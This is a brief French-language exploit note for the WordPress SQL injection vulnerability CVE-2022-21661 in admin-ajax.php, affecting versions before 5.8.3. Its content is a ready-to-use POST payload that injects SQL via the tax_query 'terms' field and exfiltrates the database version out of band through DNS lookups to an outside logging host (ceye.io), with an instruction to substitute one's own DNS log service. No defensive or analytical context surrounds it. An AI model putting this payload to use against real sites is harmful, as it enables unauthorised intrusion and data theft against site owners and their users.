
Exploit pour la vulnérabilité d'injection SQL CVE-2022-21661 de WordPress dans admin-ajax.php, utilisant l'exfiltration de données hors bande via DNS pour les versions antérieures à 5.8.3.
#version<5.8.3
chemin:http://your target/wp-admin/admin-ajax.php
Le type d'injection est hors bande, vous devez spécifier dnslog vous-même et remplacer ceye.io
POST- DONNÉES:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}